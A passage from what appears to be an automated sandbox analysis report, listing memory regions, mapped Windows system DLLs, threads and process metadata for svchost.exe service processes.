region_type = private name = "private_0x0000004a64b00000" filename = "" Region: id = 13942 start_va = 0x4a64b10000 end_va = 0x4a64bcdfff entry_point = 0x4a64b10000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13943 start_va = 0x4a64c50000 end_va = 0x4a64ccffff entry_point = 0x0 region_type = private name = "private_0x0000004a64c50000" filename = "" Region: id = 13944 start_va = 0x4a64cd0000 end_va = 0x4a64cd6fff entry_point = 0x0 region_type = private name = "private_0x0000004a64cd0000" filename = "" Region: id = 13945 start_va = 0x4a64ce0000 end_va = 0x4a64ce0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004a64ce0000" filename = "" Region: id = 13946 start_va = 0x4a64cf0000 end_va = 0x4a64cf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004a64cf0000" filename = "" Region: id = 13947 start_va = 0x4a64d00000 end_va = 0x4a64dfffff entry_point = 0x0 region_type = private name = "private_0x0000004a64d00000" filename = "" Region: id = 13948 start_va = 0x4a64e00000 end_va = 0x4a64efffff entry_point = 0x0 region_type = private name = "private_0x0000004a64e00000" filename = "" Region: id = 13949 start_va = 0x4a64f00000 end_va = 0x4a64ffffff entry_point = 0x0 region_type = private name = "private_0x0000004a64f00000" filename = "" Region: id = 13950 start_va = 0x4a65000000 end_va = 0x4a650fffff entry_point = 0x0 region_type = private name = "private_0x0000004a65000000" filename = "" Region: id = 13951 start_va = 0x4a65100000 end_va = 0x4a65103fff entry_point = 0x0 region_type = private name = "private_0x0000004a65100000" filename = "" Region: id = 13952 start_va = 0x4a651c0000 end_va = 0x4a651c6fff entry_point = 0x0 region_type = private name = "private_0x0000004a651c0000" filename = "" Region: id = 13953 start_va = 0x4a65200000 end_va = 0x4a652fffff entry_point = 0x0 region_type = private name = "private_0x0000004a65200000" filename = "" Region: id = 13954 start_va = 0x4a65300000 end_va = 0x4a65636fff entry_point = 0x4a65300000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 13955 start_va = 0x4a65640000 end_va = 0x4a6573ffff entry_point = 0x0 region_type = private name = "private_0x0000004a65640000" filename = "" Region: id = 13956 start_va = 0x4a65740000 end_va = 0x4a6583ffff entry_point = 0x0 region_type = private name = "private_0x0000004a65740000" filename = "" Region: id = 13957 start_va = 0x4a65940000 end_va = 0x4a65a3ffff entry_point = 0x0 region_type = private name = "private_0x0000004a65940000" filename = "" Region: id = 13958 start_va = 0x4a65a40000 end_va = 0x4a65b3ffff entry_point = 0x0 region_type = private name = "private_0x0000004a65a40000" filename = "" Region: id = 13959 start_va = 0x4a65b40000 end_va = 0x4a65c3ffff entry_point = 0x0 region_type = private name = "private_0x0000004a65b40000" filename = "" Region: id = 13960 start_va = 0x4a65d00000 end_va = 0x4a65dfffff entry_point = 0x0 region_type = private name = "private_0x0000004a65d00000" filename = "" Region: id = 13961 start_va = 0x4a65e00000 end_va = 0x4a65efffff entry_point = 0x0 region_type = private name = "private_0x0000004a65e00000" filename = "" Region: id = 13962 start_va = 0x7df5ffd20000 end_va = 0x7ff5ffd1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffd20000" filename = "" Region: id = 13963 start_va = 0x7ff7b33e0000 end_va = 0x7ff7b33e1fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b33e0000" filename = "" Region: id = 13964 start_va = 0x7ff7b33e2000 end_va = 0x7ff7b33e3fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b33e2000" filename = "" Region: id = 13965 start_va = 0x7ff7b33e4000 end_va = 0x7ff7b33e5fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b33e4000" filename = "" Region: id = 13966 start_va = 0x7ff7b33e6000 end_va = 0x7ff7b33e7fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b33e6000" filename = "" Region: id = 13967 start_va = 0x7ff7b33ea000 end_va = 0x7ff7b33ebfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b33ea000" filename = "" Region: id = 13968 start_va = 0x7ff7b33ec000 end_va = 0x7ff7b33edfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b33ec000" filename = "" Region: id = 13969 start_va = 0x7ff7b33ee000 end_va = 0x7ff7b33effff entry_point = 0x0 region_type = private name = "private_0x00007ff7b33ee000" filename = "" Region: id = 13970 start_va = 0x7ff7b33f0000 end_va = 0x7ff7b34effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7b33f0000" filename = "" Region: id = 13971 start_va = 0x7ff7b34f0000 end_va = 0x7ff7b3512fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7b34f0000" filename = "" Region: id = 13972 start_va = 0x7ff7b3514000 end_va = 0x7ff7b3515fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3514000" filename = "" Region: id = 13973 start_va = 0x7ff7b3516000 end_va = 0x7ff7b3517fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3516000" filename = "" Region: id = 13974 start_va = 0x7ff7b3518000 end_va = 0x7ff7b3519fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3518000" filename = "" Region: id = 13975 start_va = 0x7ff7b351c000 end_va = 0x7ff7b351cfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b351c000" filename = "" Region: id = 13976 start_va = 0x7ff7b351e000 end_va = 0x7ff7b351ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b351e000" filename = "" Region: id = 13977 start_va = 0x7ff7b3dc0000 end_va = 0x7ff7b3dccfff entry_point = 0x7ff7b3dc0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 13978 start_va = 0x7ffbf4cc0000 end_va = 0x7ffbf4cd5fff entry_point = 0x7ffbf4cc0000 region_type = mapped_file name = "capauthz.dll" filename = "\\Windows\\System32\\capauthz.dll" (normalized: "c:\\windows\\system32\\capauthz.dll") Region: id = 13979 start_va = 0x7ffbfced0000 end_va = 0x7ffbfcf37fff entry_point = 0x7ffbfced0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 13980 start_va = 0x7ffbfd180000 end_va = 0x7ffbfd18ffff entry_point = 0x7ffbfd180000 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 13981 start_va = 0x7ffbfe5c0000 end_va = 0x7ffbfe5d2fff entry_point = 0x7ffbfe5c0000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 13982 start_va = 0x7ffbff5d0000 end_va = 0x7ffbff601fff entry_point = 0x7ffbff5d0000 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 13983 start_va = 0x7ffbff610000 end_va = 0x7ffbff691fff entry_point = 0x7ffbff610000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 13984 start_va = 0x7ffbff6a0000 end_va = 0x7ffbff6b2fff entry_point = 0x7ffbff6a0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 13985 start_va = 0x7ffbff6c0000 end_va = 0x7ffbff6d6fff entry_point = 0x7ffbff6c0000 region_type = mapped_file name = "rpcepmap.dll" filename = "\\Windows\\System32\\RpcEpMap.dll" (normalized: "c:\\windows\\system32\\rpcepmap.dll") Region: id = 13986 start_va = 0x7ffbff6e0000 end_va = 0x7ffbff7bafff entry_point = 0x7ffbff6e0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 13987 start_va = 0x7ffbffd20000 end_va = 0x7ffbffd77fff entry_point = 0x7ffbffd20000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 13988 start_va = 0x7ffbffdc0000 end_va = 0x7ffbffdf2fff entry_point = 0x7ffbffdc0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 13989 start_va = 0x7ffc00110000 end_va = 0x7ffc0016cfff entry_point = 0x7ffc00110000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 13990 start_va = 0x7ffc00170000 end_va = 0x7ffc00186fff entry_point = 0x7ffc00170000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 13991 start_va = 0x7ffc002e0000 end_va = 0x7ffc002eafff entry_point = 0x7ffc002e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 13992 start_va = 0x7ffc004c0000 end_va = 0x7ffc004ebfff entry_point = 0x7ffc004c0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 13993 start_va = 0x7ffc006c0000 end_va = 0x7ffc006e7fff entry_point = 0x7ffc006c0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 13994 start_va = 0x7ffc006f0000 end_va = 0x7ffc0075afff entry_point = 0x7ffc006f0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 13995 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 13996 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 13997 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13998 start_va = 0x7ffc01540000 end_va = 0x7ffc015e4fff entry_point = 0x7ffc01540000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 13999 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 14000 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 14001 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 14002 start_va = 0x7ffc02050000 end_va = 0x7ffc02057fff entry_point = 0x7ffc02050000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 14003 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14004 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 14005 start_va = 0x7ffc03980000 end_va = 0x7ffc039e8fff entry_point = 0x7ffc03980000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 14006 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14007 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 1197 os_tid = 0x86c Thread: id = 1198 os_tid = 0x6b0 Thread: id = 1199 os_tid = 0x5fc Thread: id = 1200 os_tid = 0x3f4 Thread: id = 1201 os_tid = 0x334 Thread: id = 1202 os_tid = 0x2a4 Thread: id = 1203 os_tid = 0x29c Thread: id = 1204 os_tid = 0x290 Thread: id = 1205 os_tid = 0x28c Thread: id = 1206 os_tid = 0x284 Thread: id = 1207 os_tid = 0x26c Process: id = "283" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x54b20000" os_pid = "0x324" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "280" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AppIDSvc" [0xa], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xa], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\icssvc" [0xa], "NT SERVICE\\lmhosts" [0xe], "NT SERVICE\\NgcCtnrSvc" [0xa], "NT SERVICE\\vmictimesync" [0xa], "NT SERVICE\\Wcmsvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b105" [0xc000000f], "LOCAL" [0x7] Region: id = 14905 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 14906 start_va = 0xaf67cb0000 end_va = 0xaf67cbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000af67cb0000" filename = "" Region: id = 14907 start_va = 0xaf67cc0000 end_va = 0xaf67cc0fff entry_point = 0xaf67cc0000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 14908 start_va = 0xaf67cd0000 end_va = 0xaf67ce3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000af67cd0000" filename = "" Region: id = 14909 start_va = 0xaf67cf0000 end_va = 0xaf67d6ffff entry_point = 0x0 region_type = private name = "private_0x000000af67cf0000" filename = "" Region: id = 14910 start_va = 0xaf67d70000 end_va = 0xaf67d73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000af67d70000" filename = "" Region: id = 14911 start_va = 0xaf67d80000 end_va = 0xaf67d80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000af67d80000" filename = "" Region: id = 14912 start_va = 0xaf67d90000 end_va = 0xaf67d91fff entry_point = 0x0 region_type = private name = "private_0x000000af67d90000" filename = "" Region: id = 14913 start_va = 0xaf67da0000 end_va = 0xaf67e5dfff entry_point = 0xaf67da0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14914 start_va = 0xaf67e60000 end_va = 0xaf67e60fff entry_point = 0x0 region_type = private name = "private_0x000000af67e60000" filename = "" Region: id = 14915 start_va = 0xaf67e70000 end_va = 0xaf67e76fff entry_point = 0x0 region_type = private name = "private_0x000000af67e70000" filename = "" Region: id = 14916 start_va = 0xaf67e80000 end_va = 0xaf67e80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000af67e80000" filename = "" Region: id = 14917 start_va = 0xaf67e90000 end_va = 0xaf67e90fff entry_point = 0x0 region_type = private name = "private_0x000000af67e90000" filename = "" Region: id = 14918 start_va = 0xaf67f00000 end_va = 0xaf67ffffff entry_point = 0x0 region_type = private name = "private_0x000000af67f00000" filename = "" Region: id = 14919 start_va = 0xaf68000000 end_va = 0xaf68187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000af68000000" filename = "" Region: id = 14920 start_va = 0xaf68190000 end_va = 0xaf68196fff entry_point = 0x0 region_type = private name = "private_0x000000af68190000" filename = "" Region: id = 14921 start_va = 0xaf681a0000 end_va = 0xaf681a0fff entry_point = 0x0 region_type = private name = "private_0x000000af681a0000" filename = "" Region: id = 14922 start_va = 0xaf681b0000 end_va = 0xaf681cffff entry_point = 0x0 region_type = private name = "private_0x000000af681b0000" filename = "" Region: id = 14923 start_va = 0xaf681d0000 end_va = 0xaf681effff entry_point = 0x0 region_type = private name = "private_0x000000af681d0000" filename = "" Region: id = 14924 start_va = 0xaf681f0000 end_va = 0xaf681f4fff entry_point = 0xaf681f0000 region_type = mapped_file name = "pcaevts.dll" filename = "\\Windows\\System32\\pcaevts.dll" (normalized: "c:\\windows\\system32\\pcaevts.dll") Region: id = 14925 start_va = 0xaf68200000 end_va = 0xaf682fffff entry_point = 0x0 region_type = private name = "private_0x000000af68200000" filename = "" Region: id = 14926 start_va = 0xaf68300000 end_va = 0xaf68480fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000af68300000" filename = "" Region: id = 14927 start_va = 0xaf68490000 end_va = 0xaf6854ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000af68490000" filename = "" Region: id = 14928 start_va = 0xaf68550000 end_va = 0xaf6864ffff entry_point = 0x0 region_type = private name = "private_0x000000af68550000" filename = "" Region: id = 14929 start_va = 0xaf68650000 end_va = 0xaf686cffff entry_point = 0x0 region_type = private name = "private_0x000000af68650000" filename = "" Region: id = 14930 start_va = 0xaf686d0000 end_va = 0xaf686d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000af686d0000" filename = "" Region: id = 14931 start_va = 0xaf686e0000 end_va = 0xaf686e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000af686e0000" filename = "" Region: id = 14932 start_va = 0xaf686f0000 end_va = 0xaf686f0fff entry_point = 0x0 region_type = private name = "private_0x000000af686f0000" filename = "" Region: id = 14933 start_va = 0xaf68700000 end_va = 0xaf68700fff entry_point = 0x0 region_type = private name = "private_0x000000af68700000" filename = "" Region: id = 14934 start_va = 0xaf68710000 end_va = 0xaf68710fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000af68710000" filename = "" Region: id = 14935 start_va = 0xaf68720000 end_va = 0xaf6881ffff entry_point = 0x0 region_type = private name = "private_0x000000af68720000" filename = "" Region: id = 14936 start_va = 0xaf68850000 end_va = 0xaf6894ffff entry_point = 0x0 region_type = private name = "private_0x000000af68850000" filename = "" Region: id = 14937 start_va = 0xaf68950000 end_va = 0xaf689b4fff entry_point = 0xaf68950000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 14938 start_va = 0xaf689c0000 end_va = 0xaf689dffff entry_point = 0x0 region_type = private name = "private_0x000000af689c0000" filename = "" Region: id = 14939 start_va = 0xaf689f0000 end_va = 0xaf689f6fff entry_point = 0x0 region_type = private name = "private_0x000000af689f0000" filename = "" Region: id = 14940 start_va = 0xaf68a00000 end_va = 0xaf68afffff entry_point = 0x0 region_type = private name = "private_0x000000af68a00000" filename = "" Region: id = 14941 start_va = 0xaf68b00000 end_va = 0xaf68b7ffff entry_point = 0x0 region_type = private name = "private_0x000000af68b00000" filename = "" Region: id = 14942 start_va = 0xaf68b80000 end_va = 0xaf68bfffff entry_point = 0x0 region_type = private name = "private_0x000000af68b80000" filename = "" Region: id = 14943 start_va = 0xaf68c00000 end_va = 0xaf68c7ffff entry_point = 0x0 region_type = private name = "private_0x000000af68c00000" filename = "" Region: id = 14944 start_va = 0xaf68c80000 end_va = 0xaf68cfffff entry_point = 0x0 region_type = private name = "private_0x000000af68c80000" filename = "" Region: id = 14945 start_va = 0xaf68d00000 end_va = 0xaf68d7ffff entry_point = 0x0 region_type = private name = "private_0x000000af68d00000" filename = "" Region: id = 14946 start_va = 0xaf68d80000 end_va = 0xaf68dfffff entry_point = 0x0 region_type = private name = "private_0x000000af68d80000" filename = "" Region: id = 14947 start_va = 0xaf68e00000 end_va = 0xaf68efffff entry_point = 0x0 region_type = private name = "private_0x000000af68e00000" filename = "" Region: id = 14948 start_va = 0xaf68f00000 end_va = 0xaf68ffffff entry_point = 0x0 region_type = private name = "private_0x000000af68f00000" filename = "" Region: id = 14949 start_va = 0xaf69000000 end_va = 0xaf690fffff entry_point = 0x0 region_type = private name = "private_0x000000af69000000" filename = "" Region: id = 14950 start_va = 0xaf69100000 end_va = 0xaf6916ffff entry_point = 0xaf69100000 region_type = mapped_file name = "services.exe" filename = "\\Windows\\System32\\services.exe" (normalized: "c:\\windows\\system32\\services.exe") Region: id = 14951 start_va = 0xaf69170000 end_va = 0xaf691effff entry_point = 0x0 region_type = private name = "private_0x000000af69170000" filename = "" Region: id = 14952 start_va = 0xaf69200000 end_va = 0xaf692fffff entry_point = 0x0 region_type = private name = "private_0x000000af69200000" filename = "" Region: id = 14953 start_va = 0xaf69300000 end_va = 0xaf69636fff entry_point = 0xaf69300000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 14954 start_va = 0xaf69640000 end_va = 0xaf6973ffff entry_point = 0x0 region_type = private name = "private_0x000000af69640000" filename = "" Region: id = 14955 start_va = 0xaf69740000 end_va = 0xaf6983ffff entry_point = 0x0 region_type = private name = "private_0x000000af69740000" filename = "" Region: id = 14956 start_va = 0xaf69840000 end_va = 0xaf6993ffff entry_point = 0x0 region_type = private name = "private_0x000000af69840000" filename = "" Region: id = 14957 start_va = 0xaf69a40000 end_va = 0xaf69abffff entry_point = 0x0 region_type = private name = "private_0x000000af69a40000" filename = "" Region: id = 14958 start_va = 0xaf69b40000 end_va = 0xaf69bd2fff entry_point = 0xaf69b40000 region_type = mapped_file name = "winlogon.exe" filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe") Region: id = 14959 start_va = 0xaf69c00000 end_va = 0xaf69cfffff entry_point = 0x0 region_type = private name = "private_0x000000af69c00000" filename = "" Region: id = 14960 start_va = 0xaf69d00000 end_va = 0xaf69dfffff entry_point = 0x0 region_type = private name = "private_0x000000af69d00000" filename = "" Region: id = 14961 start_va = 0xaf69e00000 end_va = 0xaf69efffff entry_point = 0x0 region_type = private name = "private_0x000000af69e00000" filename = "" Region: id = 14962 start_va = 0xaf69f00000 end_va = 0xaf69ffffff entry_point = 0x0 region_type = private name = "private_0x000000af69f00000" filename = "" Region: id = 14963 start_va = 0xaf6a000000 end_va = 0xaf6a0fffff entry_point = 0x0 region_type = private name = "private_0x000000af6a000000" filename = "" Region: id = 14964 start_va = 0xaf6a100000 end_va = 0xaf6a1fffff entry_point = 0x0 region_type = private name = "private_0x000000af6a100000" filename = "" Region: id = 14965 start_va = 0xaf6a200000 end_va = 0xaf6a2fffff entry_point = 0x0 region_type = private name = "private_0x000000af6a200000" filename = "" Region: id = 14966 start_va = 0xaf6a300000 end_va = 0xaf6a3fffff entry_point = 0x0 region_type = private name = "private_0x000000af6a300000" filename = "" Region: id = 14967 start_va = 0xaf6a400000 end_va = 0xaf6a4fffff entry_point = 0x0 region_type = private name = "private_0x000000af6a400000" filename = "" Region: id = 14968 start_va = 0xaf6a500000 end_va = 0xaf6a5fffff entry_point = 0x0 region_type = private name = "private_0x000000af6a500000" filename = "" Region: id = 14969 start_va = 0xaf6a680000 end_va = 0xaf6a77ffff entry_point = 0x0 region_type = private name = "private_0x000000af6a680000" filename = "" Region: id = 14970 start_va = 0xaf6a800000 end_va = 0xaf6a8fffff entry_point = 0x0 region_type = private name = "private_0x000000af6a800000" filename = "" Region: id = 14971 start_va = 0xaf6a900000 end_va = 0xaf6a9fffff entry_point = 0x0 region_type = private name = "private_0x000000af6a900000" filename = "" Region: id = 14972 start_va = 0xaf6aa00000 end_va = 0xaf6aafffff entry_point = 0x0 region_type = private name = "private_0x000000af6aa00000" filename = "" Region: id = 14973 start_va = 0xaf6ab00000 end_va = 0xaf6abfffff entry_point = 0x0 region_type = private name = "private_0x000000af6ab00000" filename = "" Region: id = 14974 start_va = 0xaf6ac00000 end_va = 0xaf6acfffff entry_point = 0x0 region_type = private name = "private_0x000000af6ac00000" filename = "" Region: id = 14975 start_va = 0xaf6ad00000 end_va = 0xaf6adfffff entry_point = 0x0 region_type = private name = "private_0x000000af6ad00000" filename = "" Region: id = 14976 start_va = 0xaf6ae00000 end_va = 0xaf6aefffff entry_point = 0x0 region_type = private name = "private_0x000000af6ae00000" filename = "" Region: id = 14977 start_va = 0x7df5ff100000 end_va = 0x7ff5ff0fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff100000" filename = "" Region: id = 14978 start_va = 0x7ff7b331a000 end_va = 0x7ff7b331bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b331a000" filename = "" Region: id = 14979 start_va = 0x7ff7b331c000 end_va = 0x7ff7b331dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b331c000" filename = "" Region: id = 14980 start_va = 0x7ff7b331e000 end_va = 0x7ff7b331ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b331e000" filename = "" Region: id = 14981 start_va = 0x7ff7b3320000 end_va = 0x7ff7b3321fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3320000" filename = "" Region: id = 14982 start_va = 0x7ff7b3322000 end_va = 0x7ff7b3323fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3322000" filename = "" Region: id = 14983 start_va = 0x7ff7b3324000 end_va = 0x7ff7b3325fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3324000" filename = "" Region: id = 14984 start_va = 0x7ff7b3326000 end_va = 0x7ff7b3327fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3326000" filename = "" Region: id = 14985 start_va = 0x7ff7b3328000 end_va = 0x7ff7b3329fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3328000" filename = "" Region: id = 14986 start_va = 0x7ff7b332a000 end_va = 0x7ff7b332bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b332a000" filename = "" Region: id = 14987 start_va = 0x7ff7b332c000 end_va = 0x7ff7b332dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b332c000" filename = "" Region: id = 14988 start_va = 0x7ff7b332e000 end_va = 0x7ff7b332ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b332e000" filename = "" Region: id = 14989 start_va = 0x7ff7b3330000 end_va = 0x7ff7b3331fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3330000" filename = "" Region: id = 14990 start_va = 0x7ff7b3332000 end_va = 0x7ff7b3333fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3332000" filename = "" Region: id = 14991 start_va = 0x7ff7b3334000 end_va = 0x7ff7b3335fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3334000" filename = "" Region: id = 14992 start_va = 0x7ff7b3336000 end_va = 0x7ff7b3337fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3336000" filename = "" Region: id = 14993 start_va = 0x7ff7b3338000 end_va = 0x7ff7b3339fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3338000" filename = "" Region: id = 14994 start_va = 0x7ff7b333a000 end_va = 0x7ff7b333bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b333a000" filename = "" Region: id = 14995 start_va = 0x7ff7b333c000 end_va = 0x7ff7b333dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b333c000" filename = "" Region: id = 14996 start_va = 0x7ff7b333e000 end_va = 0x7ff7b333ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b333e000" filename = "" Region: id = 14997 start_va = 0x7ff7b3340000 end_va = 0x7ff7b343ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7b3340000" filename = "" Region: id = 14998 start_va = 